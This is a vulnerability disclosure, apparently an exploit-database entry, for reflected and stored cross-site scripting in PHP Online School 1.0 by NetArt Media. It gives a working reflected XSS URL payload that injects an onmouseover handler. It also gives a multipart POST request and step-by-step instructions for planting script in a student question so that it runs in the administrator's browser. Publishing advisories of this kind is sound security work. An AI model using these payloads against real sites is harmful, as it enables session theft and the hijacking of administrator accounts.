┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://www.netartmedia.net/online-school/ │ │ Vendor : NetArt Media │ │ Software : PHP Online School 1.0 │ │ Vuln Type: Reflected XSS - Stored XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ Reflected XSS │ │ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ │ │ │ Stored XSS │ │ │ │ Allow Attacker to inject malicious code into website, give ability to steal sensitive │ │ information, manipulate data, and launch additional attacks. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /index.php URL parameter is vulnerable to RXSS https://website/users/index.php?category=home&action=welcome&category=home&action=welcome&order=date&order_type=desc&e9m9f"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"fgok8=1 ## Stored XSS POST /online-school/users/index.php HTTP/2 -----------------------------124654322118707720774051212206 Content-Disposition: form-data; name="title" Any Title -----------------------------124654322118707720774051212206 Content-Disposition: form-data; name="post_message" -----------------------------124654322118707720774051212206 Content-Disposition: form-data; name="message" [XSS Payload] -----------------------------124654322118707720774051212206 ## Steps to Reproduce: 1. Signup & Login in any Normal User Mode 2. Go to [My Question] Click [Ask a New Question] on this Path (https://website/users/index.php?category=tickets&action=new) 3. Select Any Subject 4. Write any Title 5. Inject your [XSS Payload] in "Message Box" 6. Select Any Priority 7. Press Submit 8. When ADMIN check Student Questions on this Path (https://website/admin/index.php?category=tickets&action=new) 9. XSS Will Fire and Executed on his Browser [-] Done